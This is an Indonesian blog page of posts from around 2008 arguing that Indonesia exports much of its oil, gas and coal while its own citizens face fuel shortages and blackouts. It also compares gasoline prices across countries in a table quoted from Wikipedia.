Jadi sikap pemerintah Indonesia yang mempertahankan harga minyak seperti sekarang meski ahli minyak seperti Kurtubi mengkritik cukup beralasan.
More aboutTabel simulasi harga BBM di Indonesia

Sebagian Besar Energi Diekspor - Energi Indonesia untuk Siapa?

Diposting oleh fitri-ariyanto

Di bawah ini berbagai artikel yang mengungkap bagaimana Indonesia yang dilanda krisis energi justru merupakan eksportir besar di bidang energi.

Meski rakyat kesulitan mendapatkan energi seperti harus antri minyak tanah berjam-jam, BBM juga sering antri, PLN sering padam (bahkan di Jakarta tadi malam 26 April 2008 padam cukup lama selama berjam-jam) pabrik dan juga pengusaha transportasi merugi karena BBM naik, toh Indonesia merupakan eksportir minyak mentah terbesar di kawasan Australasia. Dari produksi 977 ribu bph (turun dari 1,3 juta bph), 500 ribu bph diekspor. Lebih separuh minyak yang kita produksi diekspor ke luar negeri.

Indonesia juga merupakan eksportir LNG terbesar di dunia. Indonesia mengekspor 70% produk batubara. Energi tersebut diekspor ke Jepang, Korsel, Taiwan, dsb.

Tak heran jika negara-negara yang tak punya minyak tersebut pabrik-pabrik dan industrinya tetap berkembang sementara pabrik-pabrik di Indonesia banyak yang tutup kekurangan energi atau bangkrut karena energi sudah tak terbeli lagi.

Jika sudah begitu, seperti judul artikel Kompas, Energi Indonesia untuk siapa?

Prospek Hubungan Indonesia - Jepang di Bidang Energi

Oleh Hanan Nugroho, PBIK

Jepang adalah tujuan utama ekspor energi Indonesia, yang saat ini merupakan pengekspor minyak mentah terbesar di kawasan Australasia, pengekspor batubara nomer tiga di dunia, dan pengekspor gas alam cair (LNG) terbesar di dunia. Sekitar separuh dari ekspor minyak mentah, lebih seperempat ekspor batubara dan lebih tiga per empat ekspor gas alam cair Indonesia dikirim ke Jepang. Bahkan sebelum memasok ke Korea (1986) dan Taiwan (1990), seluruh produksi gas alam cair Indonesia diekspor ke negeri yang sangat mementingkan penggunaan bahan bakar akrab lingkungan itu

http://www.lab2.kuis.kyoto-u.ac.jp/~raymond/pebola/IndoJpnEnergi.html

RI Lanjutkan Ekspor Gas ke Jepang

Selasa, 21 Agustus 2007

JAKARTA—Presiden Susilo Bambang Yudhoyono menginstruksikan agar ekspor gas ke Jepang dilanjutkan. Beberapa kontrak ekspor gas ke Jepang memang akan mulai habis pada 2010.

http://www.dumaipos.com/index.php?option=com_content&task=view&id=2559&Itemid=4

Energi Indonesia untuk Siapa?

Kompas. Di Tokyo, Presiden Yudhoyono mengumumkan Indonesia tetap akan meneruskan kontrak ekspor gas ke Negeri Sakura.

Kontrak pengiriman gas alam cair ke Jepang yang dimulai sejak 1971 berakhir pada 2010-2011.

Saat yang sama ketika Presiden berada di Jepang, terjadi kelangkaan minyak tanah di Jakarta. Ibu-ibu harus mengantre berjam-jam di pangkalan demi memperoleh jatah 2-3 liter minyak tanah. Produk ini di pasar internasional disebut kerosin, dan kerosin murni dipakai sebagai bahan bakar pesawat jet sehingga harganya sangat mahal. Di Indonesia, kerosin digunakan untuk menyalakan kompor dan dipakai untuk oplosan mesin motor nelayan yang tidak mampu membeli solar.

Setahun terakhir, warga Medan mengalami pemadaman bergilir tiga kali sehari, persis seperti jadwal makan obat, karena krisis pasokan listrik yang sangat parah di Sumatera Utara. Pembangkit Listrik Tenaga Gas dan Uap Sicanang di Belawan yang menjadi pemasok utama listrik di kota itu sudah lama tak mampu beroperasi maksimal karena pasokan gas terus menurun. Dengan kondisi keuangan yang terbatas, PT Perusahaan Listrik Negara (PLN) tidak sanggup membakar bahan bakar minyak lebih banyak untuk menggantikan gas.

Potongan-potongan fakta di atas jika direkatkan menjadi potret kekisruhan kebijakan pemanfaatan energi nasional. Indonesia belum bisa lepas dari kutukan sebagai negeri yang memiliki sumber daya alam melimpah, tetapi gagal memanfaatkan sumber daya itu sebaik-baiknya untuk menyejahterakan masyarakat. Penyebabnya adalah ketidakmampuan pengelolaan energi nasional oleh pemerintah.

Dari segi cadangan energi, Indonesia memiliki batu bara yang bisa diproduksi sebanyak 19,3 miliar ton, cadangan gas 182 triliun kaki kubik, dan cadangan minyak mentah 8 miliar barrel. Dari jumlah itu, jika tidak ada eksplorasi untuk menemukan cadangan baru batu bara hanya cukup untuk 147 tahun, gas bertahan hanya untuk 61 tahun, bahkan minyak bumi hanya mampu bertahan untuk kebutuhan 8 tahun.

Produksi batu bara Indonesia tahun ini 153,7 juta ton dan sekitar 70 persen diekspor. Produksi minyak bumi, termasuk kondensat, tahun ini diproyeksikan kurang dari 1 juta barrel per hari dan sekitar 500.000 barrel diekspor. Produksi gas alam Indonesia tahun 2005 tercatat 8,13 miliar kaki kubik per hari dan sekitar 58,4 persen diekspor dalam bentuk gas alam cair (liquefied natural gas/LNG), elpiji, dan melalui pipa.

http://www.plnjaya.co.id/berita/berita_peristiwa.asp?do=view&id=2909&idm=5&idSM=1
More aboutSebagian Besar Energi Diekspor - Energi Indonesia untuk Siapa?

Perbandingan Harga Bensin di Seluruh Dunia

Diposting oleh fitri-ariyanto

Berikut adalah daftar harga minyak di seluruh dunia. Di Venezuela harganya hanya Rp 460/liter, di Saudi Arabia Rp 1.104/liter, di Nigeria Rp 920/liter, di Iran Rp 828/liter, di Mesir Rp 2.300/liter, dan di Malaysia Rp 4.876/liter. Rata-rata pendapatan per kapita di negara-negara tersebut lebih tinggi dari kita. Sebagai contoh Malaysia sekitar 4 kali lipat dari negara kita.

Anehnya di negara kita premium yang saat ini harganya Rp 4.500/liter akan dinaikkan hingga Rp 6.000/liter sementara harga Pertamax sekitar Rp 8.700/liter.

Jelas bedanya antara negara yang mementingkan kepentingan rakyat dengan negara Neoliberalis/Pro Spekulan Pasar yang hanya mengikuti harga minyak Internasional.

AS dan Cina adalah importer minyak terbesar dan ketiga di dunia *1. Tapi harga minyak di AS cuma Rp 8.464/liter sementara Cina Rp 5.888/liter.. Padahal penduduk kedua negara lebih besar dari Indonesia (Cina penduduknya 1,3 milyar) .

Indonesia meski premium cuma Rp 4.500 (yang akan dinaikkan jadi Rp 6.000/liter) namun harga Pertamax mencapai Rp 8.700/liter. Lebih tinggi dari harga di AS. Padahal UMR di Indonesia cuma US$ 95/bulan sementara di AS US$ 980/bulan. Jadi Indonesia ini benar-benar mengikuti kemauan spekulan pasar/kaum Neoliberalis.

Dengan memakai patokan harga Internasional US$ 125/barrel maka rakyat AS yang UMRnya US$ 980/bulan masih bisa menabung US$ 955/bulan sementara rakyat Indonesia yang UMRnya hanya US$ 95/bulan harus ngutang sebanyak US$ 30/bulan. Memang rakyat miskin tidak punya mobil mewah, tapi mereka kan tetap harus pakai angkot atau sepeda motor. Dan itu pakai BBM!

Referensi:

1. http://worldnews.about.com/od/oilnaturalgas/tp/oil_imports.htm

http://en.wikipedia.org/wiki/Gasoline_usage_and_pricing

Gasoline usage and pricing

Negara US$/Ltr
Rp/Ltr Tanggal
Sumber
Australia 1.37
12,604 4/23/2008
[1]/XE.com
Belgium 2.02
18,584 11/7/2007
[4][5][6]
Brazil 1.56
14,352 4/29/2008
[citation needed]
Canada 1.25
11,500 5/5/2008
GasBuddy/XE.com
China 0.64
5,888 5/5/2007
CNN Money/[2]
Croatia 1.73
15,916 5/5/2007

Cyprus 1.63
14,996 4/22/2008
for Unleaded 95[[3]
Denmark 2.15
19,780 4/21/2008

Egypt 0.25
2,300 7/25/2007
[8]
Finland 2.1
19,320 1/5/2008
[9]
Germany 2.28
20,976 4/20/2008
[10]
Greece 1.3
11,960 3/13/2006

Hong Kong 1.997
18,372 4/12/2008
Shell Hong Kong/[4]
Iceland 2.13
19,596 3/31/2008
Esso/[5]
India 1.22
11,224 10/3/2006

Iran 0.09
828 5/5/2007
CNN Money/[6]
Israel 1.91
17,572 5/1/2008
Israel Min. of National Infrastr.
Italy 1.93
17,756 11/8/2007

Japan 1.01
9,292 9/29/2006
CNN Money/[8]
Kuwait 0.21
1,932 4/3/2006
CNN Money/[9]
Malaysia 0.53
4,876 2/3/2006
Google exchange calculator
Mexico 0.62
5,704 5/5/2007
Banco de Información Económica
Netherlands 2.36
21,712 4/28/2008
Shell
New Zealand 1.44
13,248 4/20/2008
Pricewatch/fx.com on 2006-09-29
Nigeria 0.1
920 3/3/2005
CNN Money/[13]
Norwegia 2.52
23,184 4/14/2008
Shell/[14]
Pakistan 1.06
9,752 5/4/2008
PSO/[15]
Philippines 0.94
8,648 9/17/2007
Shell Philippines/[16]
Romania 1.67
15,364 4/15/2008

Russia 1
9,200 5/7/2008
[11]
Saudi Arabia 0.12
1,104 5/16/2007

Sierra Leone 4.87
44,804 5/1/2008
[18]
Singapore 1.37
12,604 1/2/2008
PetrolWatch/XE.com
Switzerland 1.65
15,180 12/19/2007

Sweden 1.96
18,032 1/3/2008
JET/
Thailand 0.69
6,348 1/13/2007
Nation Multimedia/[19]
Turkey 2.68
24,656 4/22/2008
NTV/[20]
Turkmenistan 0.08
736 11/25/2006
Turkmenistan.ru/[21]
UAE 0.45
4,140 5/4/2008

Ukraine 1.17
10,764 4/18/2008

United Kingdom 2.16
19,872 4/20/2008
petrolprices.com/XE.com
United States 0.92
8,464 4/19/2008
[12]
Venezuela 0.05
460 1/12/2008

More aboutPerbandingan Harga Bensin di Seluruh Dunia